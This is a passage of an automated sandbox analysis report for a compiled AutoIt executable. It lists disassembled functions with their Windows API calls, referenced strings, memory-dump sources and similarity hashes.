Instruction ID: 50544d4e55f4115940545eed3535a6ded09684f3e3875c6b8e7204083f37c7f6
Opcode Fuzzy Hash: f074719c1ef68f1d900b6f11dcb7d50640780c73865d8237a63ccbdacbc534e0
Instruction Fuzzy Hash: B721B4326356108BC729CF25D841B52B3E1EFA5311B688E6CD0F5CB2C0CA74B905CB54

Function 00CC4C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00CC4C76

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 44e8763498d18f01efb65f2a2423f0e3904fb1ddd2ef45869aba15e2553953f3
Instruction ID: 04f4e9a080ceb2216ac06bc7513ee08574843c7580251d2b36c5158198354e45
Opcode Fuzzy Hash: 44e8763498d18f01efb65f2a2423f0e3904fb1ddd2ef45869aba15e2553953f3
Instruction Fuzzy Hash: 85D09EA416261979EC2C0720DDBBFFA1119E380791F94D54EF251991E1E8D4DD41A035

Function 00CB87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00CB8389), ref: 00CB87D1

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 38012400b00099f5e96f74ee2d8bb00a88b1a03f3acf053db64240e81125aa2c
Instruction ID: 7ff96f1abf60f5e9fc9b036e4072b66ca06e3301a312750d982c98cfd93588bb
Opcode Fuzzy Hash: 38012400b00099f5e96f74ee2d8bb00a88b1a03f3acf053db64240e81125aa2c
Instruction Fuzzy Hash: F6D05E3226050EABEF018EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60

Function 00C8A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C8A12A

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 98b5e8a7685accaa1bdb11abb1c9fe10b74bc79e7cd8b8f4d0232b3241fa5c3d
Instruction ID: f55b2bb7acd3583cae4947138c63736b0ca4607a78bba506ba354c24f2a40ed7
Opcode Fuzzy Hash: 98b5e8a7685accaa1bdb11abb1c9fe10b74bc79e7cd8b8f4d0232b3241fa5c3d
Instruction Fuzzy Hash: 6CA0223000020CFBCF002F82FC08A8CBFACEB002E0B008030F80C88032CB33A8228AC0

Function 00C78808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5d9984a4191934cb7728d0afa6955d4a6cb801532c17ad9c210fc827a05b6bc
Instruction ID: 29ab167631ee3fb7bc2e33d4bdc80c79ad4cdaf6dc0299a5f4592c255db20839
Opcode Fuzzy Hash: e5d9984a4191934cb7728d0afa6955d4a6cb801532c17ad9c210fc827a05b6bc
Instruction Fuzzy Hash: 32225930548546CBDF388A29C4987BCBBA1FF41314F28C06BDB6A87592DB74DE89D742

Function 00C821C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 135916b732aa917bc11538fdd8b6d30a039d3501a53ecb4650cdd0a295d53a22
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 72C1A93220506309DF2E573A843813EFAE55EA27B531E475ED8B3CB1D4EE20CA25D724

Function 00C825FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 8653e1b56f29477a00430ddf96198a09eb2e560b19d6f91ae0261731bd5cb250
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 89C175332051A30ADF2E563AC43813EBAE55FA27B531E476ED8B3DB1D4EE10CA259714

Function 00C81978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 5f355c1cab61126d5e0af8b0957c067ca6460c4bb55568f488e6654841cbcfcd
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 9AC185322051A30ADF2E563AC43413EBAE55EA27B531E476EDCB3CB1C4EE10CA26D714

Function 00CD7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00CD785B
DeleteObject.GDI32(00000000), ref: 00CD786D
DestroyWindow.USER32 ref: 00CD787B
GetDesktopWindow.USER32 ref: 00CD7895
GetWindowRect.USER32(00000000), ref: 00CD789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00CD79DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00CD79ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7A35
GetClientRect.USER32(00000000,?), ref: 00CD7A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CD7A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7ABB
GlobalLock.KERNEL32(00000000), ref: 00CD7AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7AD3
GlobalUnlock.KERNEL32(00000000), ref: 00CD7ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7AE3
GlobalFree.KERNEL32(00000000), ref: 00CD7AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00CF2CAC,00000000), ref: 00CD7B16
GlobalFree.KERNEL32(00000000), ref: 00CD7B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00CD7B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00CD7B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CD7D7A

Strings

DISPLAY, xrefs: 00CD7BDD
static, xrefs: 00CD7A75, 00CD7BCC
, xrefs: 00CD7D00
AutoIt v3, xrefs: 00CD7A2D

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: b1e2539f9c1d7626d7032c5b8551394f373e861eae14535cf15c6bcb3393bec6
Instruction ID: 5c2d9bf8c82ac9c0a07e3f41a8b78d406b028a1f7367262363a2b0e570ece9a5
Opcode Fuzzy Hash: b1e2539f9c1d7626d7032c5b8551394f373e861eae14535cf15c6bcb3393bec6
Instruction Fuzzy Hash: 22024E71900255EFDB14DFA4DC89EAE7BB9EF48310F148259FA15AB3A1D731AD02CB60

Function 00CE356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00CEF910), ref: 00CE3627
IsWindowVisible.USER32(?), ref: 00CE364B

Strings

GETSELECTED, xrefs: 00CE38A3
ISCHECKED, xrefs: 00CE3839
GETCURRENTSELECTION, xrefs: 00CE37E3
GETLINECOUNT, xrefs: 00CE38C6
UNCHECK, xrefs: 00CE3883
SHOWDROPDOWN, xrefs: 00CE36E0
FINDSTRING, xrefs: 00CE3776
DELSTRING, xrefs: 00CE3749
ISENABLED, xrefs: 00CE366B
EDITPASTE, xrefs: 00CE395F
CURRENTTAB, xrefs: 00CE36BD
GETCURRENTCOL, xrefs: 00CE3928
ISVISIBLE, xrefs: 00CE3637
TABLEFT, xrefs: 00CE3687
GETLINE, xrefs: 00CE399B
GETCURRENTLINE, xrefs: 00CE38ED
CHECK, xrefs: 00CE386D
SELECTSTRING, xrefs: 00CE3806
ADDSTRING, xrefs: 00CE3716
TABRIGHT, xrefs: 00CE369D
SENDCOMMANDID, xrefs: 00CE39DA
HIDEDROPDOWN, xrefs: 00CE3700
SETCURRENTSELECTION, xrefs: 00CE37B6

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 9cc86d017f68ec0ed2fd9d539f5588a0754951667bd533a9e75a3998949917a3
Instruction ID: b67bcfcde9c6ab9366bcbf71ab5017782fbe32ad4e178bf119729e17455c4830
Opcode Fuzzy Hash: 9cc86d017f68ec0ed2fd9d539f5588a0754951667bd533a9e75a3998949917a3
Instruction Fuzzy Hash: 52D1A2742043819BCB14EF11C46AAAEB7E5EF94344F154468F8925B3E3CB31EE4AEB51

Function 00CEA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00CEA630
GetSysColorBrush.USER32(0000000F), ref: 00CEA661
GetSysColor.USER32(0000000F), ref: 00CEA66D
SetBkColor.GDI32(?,000000FF), ref: 00CEA687
SelectObject.GDI32(?,00000000), ref: 00CEA696
InflateRect.USER32(?,000000FF,000000FF), ref: 00CEA6C1
GetSysColor.USER32(00000010), ref: 00CEA6C9
CreateSolidBrush.GDI32(00000000), ref: 00CEA6D0
FrameRect.USER32(?,?,00000000), ref: 00CEA6DF
DeleteObject.GDI32(00000000), ref: 00CEA6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 00CEA731
FillRect.USER32(?,?,00000000), ref: 00CEA763
GetWindowLongW.USER32(?,000000F0), ref: 00CEA78E

Part of subcall function 00CEA8CA: GetSysColor.USER32(00000012), ref: 00CEA903
Part of subcall function 00CEA8CA: SetTextColor.GDI32(?,?), ref: 00CEA907
Part of subcall function 00CEA8CA: GetSysColorBrush.USER32(0000000F), ref: 00CEA91D
Part of subcall function 00CEA8CA: GetSysColor.USER32(0000000F), ref: 00CEA928
Part of subcall function 00CEA8CA: GetSysColor.USER32(00000011), ref: 00CEA945
Part of subcall function 00CEA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CEA953
Part of subcall function 00CEA8CA: SelectObject.GDI32(?,00000000), ref: 00CEA964
Part of subcall function 00CEA8CA: SetBkColor.GDI32(?,00000000), ref: 00CEA96D
Part of subcall function 00CEA8CA: SelectObject.GDI32(?,?), ref: 00CEA97A
Part of subcall function 00CEA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00CEA999
Part of subcall function 00CEA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CEA9B0
Part of subcall function 00CEA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00CEA9C5
Part of subcall function 00CEA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CEA9ED

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 29990483f9c40df4ffac024f20e35718d13a2a24801b376229665023f1665e6b
Instruction ID: cd12f98ae8ca82a7a501745e05c076fdac0b61688a480d42d23ca3fda97dc4dc
Opcode Fuzzy Hash: 29990483f9c40df4ffac024f20e35718d13a2a24801b376229665023f1665e6b
Instruction Fuzzy Hash: 88918D72009385AFD7109F65DC48B5F7BB9FF88321F100A2DF5A29A1A0D770E945CB52

Function 00C62C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00C62CA2
DeleteObject.GDI32(00000000), ref: 00C62CE8
DeleteObject.GDI32(00000000), ref: 00C62CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00C62CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00C62D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00C9C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C9C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C9C89D

Part of subcall function 00C61B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C62036,?,00000000,?,?,?,?,00C616CB,00000000,?), ref: 00C61B9A

SendMessageW.USER32(?,00001053), ref: 00C9C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C9C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C9C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C9C912

Strings

0, xrefs: 00C9C731

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 5b48bf9a505bb218485ce0fe57f6eecd69b07ffb32cdbd02177bca39c0cb2f38
Instruction ID: 68c0fc774103fa5e144fcc033a09627055c028f08d540c3e97b8521e42e18ed0
Opcode Fuzzy Hash: 5b48bf9a505bb218485ce0fe57f6eecd69b07ffb32cdbd02177bca39c0cb2f38
Instruction Fuzzy Hash: 52128A30604641EFDB25CF24C8C8BA9BBE5BF44350F544569F8A9CB262CB31EA52DB91

Function 00CD74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00CD74DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CD759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00CD75DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00CD75ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00CD7633
GetClientRect.USER32(00000000,?), ref: 00CD763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00CD7683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CD7692
GetStockObject.GDI32(00000011), ref: 00CD76A2
SelectObject.GDI32(00000000,00000000), ref: 00CD76A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00CD76B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CD76BF
DeleteDC.GDI32(00000000), ref: 00CD76C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CD76F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 00CD770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00CD7746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CD775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 00CD776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00CD779B
GetStockObject.GDI32(00000011), ref: 00CD77A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CD77B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00CD77BB

Strings

DISPLAY, xrefs: 00CD7688
static, xrefs: 00CD767D, 00CD7795
msctls_progress32, xrefs: 00CD773C
AutoIt v3, xrefs: 00CD762B

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: bfb761d72ae768f04a3feca6df82195d525e5f365721d8ac8cc8e00f60ff00a2
Instruction ID: 3bae83be82f1d3c6edc49848799e5495724687222dc116dd4e116ed942cfc212
Opcode Fuzzy Hash: bfb761d72ae768f04a3feca6df82195d525e5f365721d8ac8cc8e00f60ff00a2
Instruction Fuzzy Hash: 56A16171A40615BFEB24DBA4DC8AFAE7B69EF45710F104219FA14EB2E0D770AD01CB64

Function 00CCAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00CCAD1E
GetDriveTypeW.KERNEL32(?,00CEFAC0,?,\\.\,00CEF910), ref: 00CCADFB
SetErrorMode.KERNEL32(00000000,00CEFAC0,?,\\.\,00CEF910), ref: 00CCAF59

Strings

SCSI, xrefs: 00CCAEC6
RAID, xrefs: 00CCAEF7
RAMDisk, xrefs: 00CCAE25
Virtual, xrefs: 00CCAF21
Fixed, xrefs: 00CCAE43
1394, xrefs: 00CCAEDB
SSD, xrefs: 00CCAE86
SSA, xrefs: 00CCAEE2
Removable, xrefs: 00CCAE4D
ATAPI, xrefs: 00CCAECD
Fibre, xrefs: 00CCAEE9
Unknown, xrefs: 00CCAE1B, 00CCAEBF
Network, xrefs: 00CCAE39
PhysicalDrive, xrefs: 00CCADA7
iSCSI, xrefs: 00CCAEFE
SATA, xrefs: 00CCAF0C
\\.\, xrefs: 00CCAD70
MMC, xrefs: 00CCAF1A
USB, xrefs: 00CCAEF0
FileBackedVirtual, xrefs: 00CCAF28
CDROM, xrefs: 00CCAE2F
ATA, xrefs: 00CCAED4
SAS, xrefs: 00CCAF05

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 9280ae6fb29dfd5a24c2260e57fe2f0762a3e4576ec1c62fdcb3627daa6eaa1c
Instruction ID: 1af1f26b9c1ad33a7d122ae6f1f43a8bfaaf411bcff1c93c58921d368057f974
Opcode Fuzzy Hash: 9280ae6fb29dfd5a24c2260e57fe2f0762a3e4576ec1c62fdcb3627daa6eaa1c
Instruction Fuzzy Hash: D45199B064820DEF8B10DB91D98AEFD7361EF48708B20455EE417A7291DE319E46FB63

Function 00C668DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C66931
__wcsnicmp.LIBCMT ref: 00C66949
__wcsnicmp.LIBCMT ref: 00C66961
__wcsnicmp.LIBCMT ref: 00C66979
__wcsnicmp.LIBCMT ref: 00C66991
__wcsnicmp.LIBCMT ref: 00C669A9
__wcsnicmp.LIBCMT ref: 00C669C1
__wcsnicmp.LIBCMT ref: 00C669D5
__wcsnicmp.LIBCMT ref: 00C66A16
__wcsnicmp.LIBCMT ref: 00C66A2A
